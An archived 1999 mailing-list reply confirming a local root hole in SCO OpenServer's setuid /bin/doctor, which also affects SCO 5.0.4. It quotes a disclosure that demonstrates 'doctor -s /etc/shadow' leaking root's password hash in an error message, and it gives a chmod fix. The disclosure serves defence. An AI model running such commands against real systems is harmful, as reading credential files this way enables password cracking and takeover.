confirmed to run under 5.0.4 as well. On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote: > Greetings, > > > INFO: > There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example: > > scobox:/bin$ id > uid=136(btellier),200(users) > scobox:/bin$ uname -a > SCO_SV scobox 3.2 5.0.5 i386 > scobox:/bin$ doctor -V > doctor 2.0.0e 2 > scobox:/bin$ doctor -s /etc/shadow > doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::" > scobox:/bin$ > > And so on. > > FIX: > Just chmod -s until SCO comes out with a fix. Although I certianly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within. > > Brock Tellier > Systems Administrator > Webley Systems -- Seth Arnold | http://www.willamette.edu/~sarnold/ Hate spam? See http://maps.vix.com/rbl/ for help Hi! I'm a .signature virus! Copy me into your ~/.signature to help me spread!
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:27 PDT